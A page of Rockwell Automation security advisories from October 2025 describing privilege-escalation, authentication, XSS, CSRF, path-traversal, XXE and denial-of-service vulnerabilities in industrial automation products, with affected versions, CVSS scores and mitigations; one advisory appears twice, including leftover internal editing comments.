Security Advisories | Rockwell Automation

High

SD1754 | FactoryTalk® Linx Privilege Escalation Vulnerabilities

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9067 , CVE-2025-9068

Products:

FactoryTalk® Linx

CVSS Scores (v3.1):

7.8, 8.5

CVSS Scores (v4.0):

7.8, 8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

FactoryTalk® Linx Privilege Escalation Vulnerabilities

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk Linx is a modern, secure communications platform that delivers real-time control system data from Allen-Bradley devices to FactoryTalk and third-party software, optimized for Logix 5000 controllers and scalable from small setups to large distributed systems.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version
FactoryTalk Linx	CVE-2025-9067	6.40 and prior	6.50 and later
FactoryTalk Linx	CVE-2025-9068	6.40 and prior	6.50 and later

Security Issue Details

Category	Details
CVE ID	CVE-2025-9067
Impact	A security issue exists within the x86 Microsoft Installer File (MSI), installed with FTLinx. Authenticated attackers with valid Windows user credentials can initiate a repair and hijack the resulting console window. This allows the launching of a command prompt running with SYSTEM-level privileges, allowing full access to all files, processes, and system resources.
CVSS 3.1 Base Score	7.8/10
CVSS 4.0 Base Score	8.5/10
CWEs	CWE-268: Privilege Chaining
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-9068
Impact	A security issue exists within the Rockwell Automation Driver Package x64 Microsoft Installer File (MSI) repair functionality, installed with FTLinx. Authenticated attackers with valid Windows Users credentials can initiate a repair and hijack the resulting console window for vbpinstall.exe. This allows the launching of a command prompt running with SYSTEM-level privileges, allowing full access to all files, processes, and system resources.
CVSS 3.1 Base Score	7.8/10
CVSS 4.0 Base Score	8.5/10
CWEs	CWE-268: Privilege Chaining
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software should consider installing the Microsoft patch to address the MSI issue and upgrade to version 6.50 or later if possible. Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14, 2025	Initial release

Glossary

· MSI: Windows Installer package used to install, update, or remove software on Windows Systems

· SYSTEM-level privileges: access or execution rights equivalent to the Windows operating system's highest authority, allowing full control over all processes, files, and configurations.

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

Critical

SD1756 | Comms - 1783-NATR Multiple Vulnerabilities

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-7328, CVE-2025-7329, CVE-2025-7330

Products:

Comms - 1783-NATR

CVSS Scores (v3.1):

10

CVSS Scores (v4.0):

9.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The 1783-NATR from Rockwell Automation is a configurable NAT (Network Address Translation) router that enables simple 1:1 IP address mapping between machine and control networks.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
Comms - 1783-NATR	CVE-2025-7328	1.006 and prior	1.007 and later	1783-NATR
	CVE-2025-7329	1.006 and prior	1.007 and later
	CVE-2025-7330	1.006 and prior	1.007 and later

Security Issue Details

Category	Details
CVE ID	CVE-2025-7328
Impact	Multiple Broken Authentication security issues exist in the affected product. The security issues are due to missing authentication checks on critical functions. These could result in potential denial-of-service, admin account takeover, or NAT rule modifications. Devices would no longer be able to communicate through NATR as a result of denial-of-service or NAT rule modifications. NAT rule modification could also result in device communication to incorrect endpoints. Admin account takeover could allow modification of configuration and require physical access to restore.
CVSS 3.1 Base Score	10/10
CVSS 4.0 Base Score	9.9/10
CWEs	CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-7329
Impact	A Stored Cross-Site Scripting security issue exists in the affected product that could potentially allow a malicious user to view and modify sensitive data or make the webpage unavailable. The vulnerability stems from missing special character filtering and encoding. Successful exploitation requires an attacker to be able to update configuration fields behind admin login.
CVSS 3.1 Base Score	8.4/10
CVSS 4.0 Base Score	8.5/10
CWEs	CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-7330
Impact	A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the impacted form. This allows for unintended configuration modification if an attacker can convince a logged in admin to visit a crafted link.
CVSS 3.1 Base Score	8.0/10
CVSS 4.0 Base Score	7.0/10
CWEs	CWE-352: Cross-Site Request Forgery (CSRF)
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14, 2025	Initial release

Glossary

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

· NAT (Network Address Translation): A method used to remap IP addresses by modifying network address information in packet headers.

· Authentication: The process of verifying the identity of a user or system.

· Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests.

· Cross-Site Request Forgery (CSRF): An attack that tricks a user into executing unwanted actions on a web application in which they’re authenticated.

· Stored Cross-Site Scripting (XSS): A vulnerability where malicious scripts are stored on the server and executed in the browser of users who access the affected content.

· Broken Authentication: A vulnerability where authentication mechanisms are improperly implemented, allowing unauthorized access or control.

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1753 | FactoryTalk View Machine Edition and PanelView Plus 7 Vulnerabilities

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9064, CVE-2025-9063

Products:

FactoryTalk View Machine Edition, PanelView Plus 7

CVSS Scores (v3.1):

7.5, 7.3

CVSS Scores (v4.0):

8.7, 7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

FactoryTalk View Machine Edition and PanelView Plus 7 Vulnerabilities

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk View Machine Edition is a versatile, machine-level HMI software that enables intuitive design, monitoring, and control of operator interfaces with superior graphics, runtime management, and scalable deployment across PanelView Plus and PC-based platforms

Affected products and solution

Affected Product

CVE

Affected Software Version

Corrected in Software Version

Affected Catalog Numbers

FactoryTalk View Machine Edition

CVE-2025-9064

FactoryTalk View ME versions earlier than V15.00

-FactoryTalk View ME V15.00 and later on ASEM 6300 IPC’s

-Patch BF31001

-PanelView Plus 7 Performance Series B V14.103 firmware package

9701M-VWSTNMT

PanelView Plus 7 Performance Series B

CVE-2025-9063

PanelView Plus 7 Performance Series B V14.100

-PanelView Plus 7 Performance Series B V14.103 firmware package

9701M-VWSTNMT

Security Issue Details

Category	Details
CVE ID	CVE-2025-9064
Impact	A path traversal security issue exists within FactoryTalk View Machine Edition, allowing unauthenticated attackers on the same network as the device to delete any file within the panels operating system. Exploitation of this vulnerability is dependent on the knowledge of filenames to be deleted.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-9063
Impact	An authentication bypass security issue exists within FactoryTalk View Machine Edition Web Browser ActiveX control. Exploitation of this vulnerability allows unauthorized access to the PanelView Plus 7 Series B, including access to the file system, retrieval of diagnostic information, event logs, and more.
CVSS 3.1 Base Score	7.3/10
CVSS 4.0 Base Score	7.0/10
CWEs	CWE-285: Improper Authorization
Known Exploited Vulnerability	No (Not listed in KEV database)
Alternate Mitigation	If updating to the latest software version is not possible, it is recommended to remove the Web Browser ActiveX Control.

Glossary

· HMI: (Human-Machine Interface) Used for industrial automation, serving as the vital link between human operators and the technology they use

· ASEM IPC: line of industrial PCs designed for various applications in manufacturing and automation

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14,, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1755 | Compact GuardLogix® 5370 Denial-Of-Service Vulnerability

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9124

Products:

Compact GuardLogix® 5370

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The Compact GuardLogix® 5370 controller from Rockwell Automation is a midrange programmable automation controller that integrates safety and motion control over EtherNet/IP, offering scalable performance.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
Compact GuardLogix® 5370	CVE-2025-9124	Version 30.012 and prior	Version 30.14 and later	1769-L3xS

Security Issue Details

Category	Details
CVE ID	CVE-2025-9124
Impact	A denial-of-service security issue in the affected product. The security issue stems from a fault occurring when a crafted CIP unconnected explicit message is sent. This can result in a major non-recoverable fault.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-248: Uncaught Exception
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14, 2025	Initial release

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests.

Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1752 | FactoryTalk® ViewPoint XXE to Denial-of-Service Vulnerability

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9066

Products:

FactoryTalk® ViewPoint

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

FactoryTalk® ViewPoint XXE to Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk ViewPoint is a mobile-ready extension of FactoryTalk View that enables secure, browser-based access to HMI graphics, trends, and alarms from FactoryTalk View SE and PanelView Plus applications, allowing users to monitor and interact with systems remotely without installing client software.

Affected products and solution

Affected Product

CVE

Affected Software Version

Corrected in Version

Affected Catalog Numbers

Panel View Plus 7 Terminal

CVE-2025-9066

Version 14 and prior

-Panel View Plus 7 Standard and Panel View Plus 7 Performance Series A v12 ,v13, v14 patch AID BF30506 (firmware fix)

-Panel View Plus 7 Performance Series B V14.103

2711P-xxx22x9P, 2711P-xxx22x9P-B, 2711P-xxx22x9PK, 2711P-Txx22D9P-BSHK, 2711P-T12W22D9P-BMxxx

Security Issue Details

Category	Details
CVE ID	CVE-2025-9066
Impact	A security issue was discovered within FactoryTalk® ViewPoint, allowing unauthenticated attackers to achieve XXE. Certain SOAP requests can be abused to perform XXE, resulting in a temporary denial-of-service.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-611: Improper Restriction of XML External Entity Reference
Known Exploited Vulnerability	No (Not listed in KEV database)

Glossary:

· XXE: XML External Entity, a vulnerability that allows attackers to interfere with an applications XML Processing by exploiting external entity references

· SOAP: Simple Object Access Protocol, a messaging protocol used for exchanging structured information in web services over HTTP or other protocols

· XML: a markup language used to encode documents that can be read by both humans and machines

· HMI: (Human-Machine Interface) Used for industrial automation, serving as the vital link between human operators and the technology they use

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14,, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1751 | ArmorStart® AOP Denial-of-Service Vulnerability

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9437

Products:

ArmorStart® AOP

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

ArmorStart® AOP Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

ArmorStart Distributed Motor Controllers are easy-to-deploy, on-machine motor control solutions that simplify installation and support EtherNet/IP™ networks for industrial automation systems.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
ArmorStart® AOP	CVE-2025-9437	V2.05.07	Not Available	280E, 281E, 284E

Security Issue Details

Category	Details
CVE ID	CVE-2025-9437
Impact	A security issue exists within the Studio 5000 Logix Designer add-on profile (AOP) for the ArmorStart Classic distributed motor controller, resulting in denial-of-service. This vulnerability is possible due to the input of invalid values into Component Object Model (COM) methods.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-248: Uncaught Exception
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

ArmorStart® AOP Denial-of-Service Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

ArmorStart Distributed Motor Controllers are easy-to-deploy, on-machine motor control solutions that simplify installation and support EtherNet/IP™ networks for industrial automation systems.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
ArmorStart® AOP	CVE-2025-9437	V2.05.07	Not Available	280E, 281E, 284E

Security Issue Details

Category	Details
CVE ID	CVE-2025-9437
Impact	A security issue exists within the Studio 5000 Logix Designer [MV1] [JC2] [MS3] [JC4] add-on profile (AOP) for the ArmorStart Classic[MS5] [JC6] distributed motor controller, resulting in denial-of-service. This vulnerability is possible due to the input of invalid values into Component Object Model (COM) methods.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-248: Uncaught Exception
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

[MV1]@Mike Stegemeyer , Is this in FTDS ? I was under the impression that this s in Logix Designer or CCW AOPs

[JC2]@Mike Stegemeyer did you see manjus comment?

[MS3]She's correct. I fixed it to be Logix Designer.

[JC4]Its a team effort, thank you all

[MS5]OPSSDB-6442 is for the products referred to as "ArmorStart Ethernet" or "ArmorStart Classic" - ArmorStart LT is a different set of catalog numbers. Joe A or someone might be able to chime in with the right name to use here.

[JC6]Thanks for pointing this out Mike, we wont move forward with disclosure until this is addressed

High

SD1757 | 1715 EtherNet/IP Comms Module Denial-Of-Service Vulnerabilities

Published Date:

October 14, 2025

Last Updated:

October 14, 2025

CVE IDs:

CVE-2025-9177, CVE-2025-9178

Products:

1715-AENTR EtherNet/IP Adapter

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

7.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The 1715 EtherNet/IP Communications Module is a fault-tolerant adapter designed for high-availability applications, enabling redundant I/O communication over EtherNet/IP.

Affected products and solution

Affected Product 

CVE 

Affected Software Version 

Corrected in Software Version 

Affected Catalog Numbers

1715-AENTR EtherNet/IP Adapter

CVE-2025-9177

Version 3.003 and prior

Version 3.011 and later

1715-AENTR

CVE-2025-9178

Version 3.003 and prior

Version 3.011 and later

Security Issue Details

Category	Details
CVE ID	CVE-2025-9177
Impact	A denial-of-service security issue exists in the affected product and version. The security issue stems from a high number of requests sent to the web server. This could result in a web server crash however; this does not impact I/O control or communication . A power cycle is required to recover and utilize the webpage.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	7.7/10
CWEs	CWE-770: Allocation of Resources Without Limits or Throttling
Known Exploited Vulnerability	No (Not listed in KEV database)

Category	Details
CVE ID	CVE-2025-9178
Impact	A denial-of-service security issue exists in the affected product and version. The security issue is caused through CIP communication using crafted payloads. The security issue could result in no CIP communication with 1715 EtherNet/IP Adapter.A restart is required to recover.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	7.7/10
CWEs	CWE-787: Out-of-bounds Write
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	October 14, 2025	Initial release

Glossary  

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited  

· CIP Communication: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. Comprises a series of protocols for communication between different devices and systems in automation technology

· Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests.  

· Web Server: Is a software and hardware system that serves content over the internet using the Hypertext Transfer Protocol (HTTP) or its secure version HTTPS. Its primary role is to store, process, and deliver webpages to users' browsers upon request.

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

